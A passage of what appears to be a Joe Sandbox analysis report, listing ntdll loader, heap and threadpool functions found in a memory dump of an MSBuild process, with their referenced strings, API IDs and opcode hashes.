                                                                                                              • LdrpInitializeProcess, xrefs: 013CC6C4
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01408177, 014081EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: fccefb0fb78e5ef1112339597fdb2d0e8ada44e8fab4fd65e14827c04ca002c6
                                                                                                              • Instruction ID: 79ac2db07d9217fa72c254e38a644dbceb71b03e8bd6937fdc867037ef198599
                                                                                                              • Opcode Fuzzy Hash: fccefb0fb78e5ef1112339597fdb2d0e8ada44e8fab4fd65e14827c04ca002c6
                                                                                                              • Instruction Fuzzy Hash: 1431D3716443469BD221EF2DD986E1B7BD4EF94F28F04056CF945AB3A1E630EC04CBA2
                                                                                                              Function 013D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 013D2DF0: LdrInitializeThunk.NTDLL ref: 013D2DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013D0BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013D0BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013D0D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013D0D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: 4dd6847ba769302e26c929d6e93ff72ac77b231185f16e9edb731f58b77addb1
                                                                                                              • Instruction ID: 418f10b9c7a702780d7a66dc08c3e3598ba668a2dae655bf928592510d0eb9bb
                                                                                                              • Opcode Fuzzy Hash: 4dd6847ba769302e26c929d6e93ff72ac77b231185f16e9edb731f58b77addb1
                                                                                                              • Instruction Fuzzy Hash: E7425B72900715DFDB25CF28C880BAAB7F5BF44318F1445AAE999DB352D770AA84CF60
                                                                                                              Function 013CC720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$H-$H-$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1597750670
                                                                                                              • Opcode ID: 7ec8c320a9e8466b72480a47de96eb8f2f9146ff9c21e4b19974e1fe1f63d6a2
                                                                                                              • Instruction ID: a174b6ae7157058ff2e229eab75d045cc2a51e4c6f0ca7907fd434fc40749c95
                                                                                                              • Opcode Fuzzy Hash: 7ec8c320a9e8466b72480a47de96eb8f2f9146ff9c21e4b19974e1fe1f63d6a2
                                                                                                              • Instruction Fuzzy Hash: 1041D0B2544301AFC721EB69D944B5F7BE8EF94A58F01492EF949E72A1E770D800CB92
                                                                                                              Function 0139A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 0d11d856a75f8349667ebb413b5697bab96bb7e8a9f4f3a5b174707cb95cd24d
                                                                                                              • Instruction ID: eba39d51b068d91c998a7fd1200b48572d36f48eac10f0d7813bac1524eeb7fc
                                                                                                              • Opcode Fuzzy Hash: 0d11d856a75f8349667ebb413b5697bab96bb7e8a9f4f3a5b174707cb95cd24d
                                                                                                              • Instruction Fuzzy Hash: 0EC18A75208386CFDB11CF58C044B6AB7E8BF84708F048A6EFA959B751E734C949CB96
                                                                                                              Function 013C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013C8421
                                                                                                              • @, xrefs: 013C8591
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013C855E
                                                                                                              • LdrpInitializeProcess, xrefs: 013C8422
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 5c2b6367fe71b4940fa8ca8395f645527bf964deed24f99809902e97d0551fe5
                                                                                                              • Instruction ID: fe0cc3f82ce954c7b437e74fd0dc95d31a117f4e797d4864bb9ea774f7e6990d
                                                                                                              • Opcode Fuzzy Hash: 5c2b6367fe71b4940fa8ca8395f645527bf964deed24f99809902e97d0551fe5
                                                                                                              • Instruction Fuzzy Hash: 72916C71508345AFD722DF69CC40EAFBAECEF94B48F40496EFA8496151E374DA048B62
                                                                                                              Function 013C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014021D9, 014022B1
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014022B6
                                                                                                              • .Local, xrefs: 013C28D8
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 014021DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: cdb7b360de8e762b3057b9d0d97d83340881a8fc9a87bdf7fc32321241615106
                                                                                                              • Instruction ID: 04f8b53100477c13ba4c3d6f7de9a22481003ab1b62884e90f20c8f940050bb6
                                                                                                              • Opcode Fuzzy Hash: cdb7b360de8e762b3057b9d0d97d83340881a8fc9a87bdf7fc32321241615106
                                                                                                              • Instruction Fuzzy Hash: 63A1A0319002299BDB25CF99DC88BEAB7B5BF58718F1541EED908A7391D7709E80CF90
                                                                                                              Function 013964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 013F1028
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013F106B
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 013F0FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013F10AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 37267dcac906dfb96dd39208fad96de2ed68f7cee24e9f814440728ea784e760
                                                                                                              • Instruction ID: 569d1ddfe37eec30e9a8da26116aac58e3faa1f4621fce8067f7fe5fdd408db7
                                                                                                              • Opcode Fuzzy Hash: 37267dcac906dfb96dd39208fad96de2ed68f7cee24e9f814440728ea784e760
                                                                                                              • Instruction Fuzzy Hash: 6871EFB1904306DFCB21EF28C885B9B7FA8AF54768F404469F9488B286D334D588CBD2
                                                                                                              Function 013B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013FA9A2
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013FA992
                                                                                                              • LdrpDynamicShimModule, xrefs: 013FA998
                                                                                                              • apphelp.dll, xrefs: 013B2462
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 85efda995b103d16d669361060f67052056679403c6c9d59e1ee9863f0822709
                                                                                                              • Instruction ID: 268145618e0d570d5a891c42baa5d5f19b614a0ed12bf6c912dce43b7a789022
                                                                                                              • Opcode Fuzzy Hash: 85efda995b103d16d669361060f67052056679403c6c9d59e1ee9863f0822709
                                                                                                              • Instruction Fuzzy Hash: 44317971A10202ABDB31AF5DD881EAF7BB8FB80B08F16006DEA056B764D770A845C780
                                                                                                              Function 013A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013A327D
                                                                                                              • HEAP[%wZ]: , xrefs: 013A3255
                                                                                                              • HEAP: , xrefs: 013A3264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: a6ef5facdd4b08f90c4ce45163f6fe938b0407a8ac7cd900e1bdeb08ed231950
                                                                                                              • Instruction ID: 645704fe7454f3dc16f4bc82c3be74868c58354027ce8921fa6b0cd098274db1
                                                                                                              • Opcode Fuzzy Hash: a6ef5facdd4b08f90c4ce45163f6fe938b0407a8ac7cd900e1bdeb08ed231950
                                                                                                              • Instruction Fuzzy Hash: 8592DE70A04249DFEB25CF68C440BAEBBF1FF08308F588059E95AAB791D735A945CF50
                                                                                                              Function 013A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 6306f697e5192ddfb2d8ceb01e1b735bfe09aa033a1ebbe93a355c1f6b78c361
                                                                                                              • Instruction ID: 7a7916cf5cb846aea69685f37449d699ef0eb39eb926fe565e5957381234b970
                                                                                                              • Opcode Fuzzy Hash: 6306f697e5192ddfb2d8ceb01e1b735bfe09aa033a1ebbe93a355c1f6b78c361
                                                                                                              • Instruction Fuzzy Hash: 59F1BE34600606EFEB29CF68C894B6ABBF5FF45308F14826DE5169B791D734E981CB90
                                                                                                              Function 013B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 2994545307-1077428164
                                                                                                              • Opcode ID: 8a7da66aebd704a865c0ca44faac5f4e8da072f5b36e0befc63c2dabbc5862b4
                                                                                                              • Instruction ID: 0ec3330e182d5f72fe77bb162655e8b1b3804588dc713abf3c96e564c62f8ba9
                                                                                                              • Opcode Fuzzy Hash: 8a7da66aebd704a865c0ca44faac5f4e8da072f5b36e0befc63c2dabbc5862b4
                                                                                                              • Instruction Fuzzy Hash: 86C272716083459FD725CF29C881BABBBE5EFC8758F04892DEA89C7681E734D805CB52
                                                                                                              Function 0138A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: fdabd074d0e0b8749204d758b1e9e065907528cc954c0c7aad9a5a9b6de60aea
                                                                                                              • Instruction ID: 0f579d403b7d32fb9b82a606dfe9e113e8019898e65fce3430ad5a0ca3534a00
                                                                                                              • Opcode Fuzzy Hash: fdabd074d0e0b8749204d758b1e9e065907528cc954c0c7aad9a5a9b6de60aea
                                                                                                              • Instruction Fuzzy Hash: 22A14D719116299BDB31DF68CC88BEEB7B8EF44718F1041EAEA09A7250D7359E84CF50
                                                                                                              Function 013B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013FA121
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 013FA10F
                                                                                                              • LdrpCheckModule, xrefs: 013FA117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: ce099e3b9debe9611c467ad7505be5ec154ee34a0e49eadc505b084cde847d74
                                                                                                              • Instruction ID: 88d7b89736b99b5ba2b13b97d58692731828b4eee9d3958a8f66a5cb3c07b306
                                                                                                              • Opcode Fuzzy Hash: ce099e3b9debe9611c467ad7505be5ec154ee34a0e49eadc505b084cde847d74
                                                                                                              • Instruction Fuzzy Hash: 3771C071A002069FDF29DF6CC981ABEB7F4FB44708F15406DEA06EBA51E734A941CB50
                                                                                                              Function 013A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 7a34bff7145f8f39a6ba4a412c0cb1244de27309ebd073f09a816040df05f128
                                                                                                              • Instruction ID: 94c6876d6e51dd9aba16cc8d0507dc770f45cb473cf11bcb788ce58d436d3185
                                                                                                              • Opcode Fuzzy Hash: 7a34bff7145f8f39a6ba4a412c0cb1244de27309ebd073f09a816040df05f128
                                                                                                              • Instruction Fuzzy Hash: 1261D130600306DFDB29CF28C540B6ABBE5FF45708F54856EE95A8F292D770E881CB91
                                                                                                              Function 0144C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 0144C1F1
                                                                                                              • PreferredUILanguages, xrefs: 0144C212
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0144C1C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: 2d3eb5a5f0d0b71a0ee6b884929cb1f5584730ad8eb0a1514b7960090340c2d0
                                                                                                              • Instruction ID: d5846ed78914d1373aee2dbc6487fcef22802a61b65facba01dc7dcc813891a3
                                                                                                              • Opcode Fuzzy Hash: 2d3eb5a5f0d0b71a0ee6b884929cb1f5584730ad8eb0a1514b7960090340c2d0
                                                                                                              • Instruction Fuzzy Hash: 70416472E01209EBEF11DFD9C881FEEBBB8BB14704F14406BE605A7250E7B49A458B50
                                                                                                              Function 01424144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: ad6194c207e695a936b95193a8b6ba53a75db9d9f933561d50be865d812684d1
                                                                                                              • Instruction ID: b81d0876172f035c278128de2fc81017ffaecd97dac985386f023d62092e7388
                                                                                                              • Opcode Fuzzy Hash: ad6194c207e695a936b95193a8b6ba53a75db9d9f933561d50be865d812684d1
                                                                                                              • Instruction Fuzzy Hash: 73415831A04368CBEB26DBD9C844BAEBBB4FF56344F68045BD901EB3A1D7748941CB60
                                                                                                              Function 01414755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpCheckRedirection, xrefs: 0141488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01414888
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01414899
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: b9b48c0561cad4bd2a29e3d5ae42de8aae195f1cfefe7e8e4ae2fd3668cb5a90
                                                                                                              • Instruction ID: 44fc32c90af61387e67352f4f9a46cf85e3c8df8252d8ffc23a2ff960bb44492
                                                                                                              • Opcode Fuzzy Hash: b9b48c0561cad4bd2a29e3d5ae42de8aae195f1cfefe7e8e4ae2fd3668cb5a90
                                                                                                              • Instruction Fuzzy Hash: 4D41D076A042518BCB22CE1DD840A2B7BE4AF89B50B0D056FED599B379D730D801CB81
                                                                                                              Function 013A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: ec96610e613ba0c7a2d2bfd80737de59c88353915b7389861c32ea5ff5f36297
                                                                                                              • Instruction ID: b2c7d13adc1a7d2c79aceb12950d57fc329640e96c4f6b3ab9655b7563526034
                                                                                                              • Opcode Fuzzy Hash: ec96610e613ba0c7a2d2bfd80737de59c88353915b7389861c32ea5ff5f36297
                                                                                                              • Instruction Fuzzy Hash: 0811DC313152069FDB2DDF18D440B6AB3A8EF40A1EF58816DF506DB665DB34E840C754
                                                                                                              Function 014120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01412104
                                                                                                              • LdrpInitializationFailure, xrefs: 014120FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 014120F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: 364624658083185ffd29d703439a8915735625b0eee5d412a1bb2b87d6a6147c
                                                                                                              • Instruction ID: fd49f9bf6a056136906bd241058346e3ead4c0321ab890519e38f8fb49e88e08
                                                                                                              • Opcode Fuzzy Hash: 364624658083185ffd29d703439a8915735625b0eee5d412a1bb2b87d6a6147c
                                                                                                              • Instruction Fuzzy Hash: 9BF0A475640209BBE724EA5D9C42F9A7B68EB41B58F20045EFA00B7795D2F0A5418691
                                                                                                              Function 013A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: bdb469bd669df69de48260d812cbf77653de94eb5200d6b4399ff366f301c02d
                                                                                                              • Instruction ID: 2535683dba93c9dcfc92c83271e466a3d73e8bad8b975cf7614d90b57a8b549d
                                                                                                              • Opcode Fuzzy Hash: bdb469bd669df69de48260d812cbf77653de94eb5200d6b4399ff366f301c02d
                                                                                                              • Instruction Fuzzy Hash: 24714D71A0014A9FDB05DFA9D990FAEBBF8FF18708F144069EA05E7251E634ED41CBA0
                                                                                                              Function 0139A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Enter, xrefs: 0139AA13
                                                                                                              • LdrResSearchResource Exit, xrefs: 0139AA25
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: aa2dc251bc6a26b90fa25dd6940e8aa2ef53ff23585fdd94c4f3eca454020e12
                                                                                                              • Instruction ID: 47b488a4c4cf425cd754be9c4a9942b718aeb8ef5319268391be3c0dfffaa2b4
                                                                                                              • Opcode Fuzzy Hash: aa2dc251bc6a26b90fa25dd6940e8aa2ef53ff23585fdd94c4f3eca454020e12
                                                                                                              • Instruction Fuzzy Hash: C9E16071E04219DBEF22DE9DC980BAEBBB9FF14318F14462AEA01E7251D774D940CB50
                                                                                                              Function 0145A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: d13590b802758b842d517196bb8beb7c96627a8503c9257ad0d0cb396ed57272
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: DDC1F4312043469BE765CF29C840B2BBBE5BFD4318F284B2EFA958B2A2D774D505CB51
                                                                                                              Function 0140E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: e286606f7038dd5342889520fbe04c252d3100a9f8a199a1ff89b03ecb3e9239
                                                                                                              • Instruction ID: cdf9cb56af7a4a127f6f7f0186181a50c7a8dc4f98f0786741a2956179b9933b
                                                                                                              • Opcode Fuzzy Hash: e286606f7038dd5342889520fbe04c252d3100a9f8a199a1ff89b03ecb3e9239
                                                                                                              • Instruction Fuzzy Hash: 2B616072E002099FDB15DFA9C840BAEBBB9FB44704F14443EE649EB2A1D731E911CB50
                                                                                                              Function 014343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
